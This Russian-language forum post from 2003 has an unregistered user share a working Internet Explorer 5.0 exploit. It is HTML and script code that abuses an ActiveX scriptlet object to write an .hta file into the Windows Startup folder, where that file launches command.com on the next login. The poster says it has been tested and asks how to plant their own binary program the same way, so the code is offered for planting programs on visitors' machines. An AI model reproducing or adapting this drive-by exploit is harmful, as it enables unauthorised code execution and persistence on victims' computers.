Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Вообще-то веб не может сохранять произвольные данные 18.06.03 02:37 Число просмотров: 1880
Автор: hello_world Статус: Незарегистрированный пользователь
|
В IE 5.0 есть баг, позволяющий вот таким образом выполнить любую команду:
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Главное меню\\Программы\\Автозагрузка\\exploit.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>"+
"wsh.Run('c:\\command.com');"+
"</SCRIPT"+">";
scr.write();
</SCRIPT>
</object>
Я проверял. Это работает. Единственная проблема в том, что я не могу записать туда свою прогу, т.к. все функции activex, которые я знаю, не хотят правильно работать с двоичными данными :(
А за кэш спасибо. Буду доки искать.
|
|
|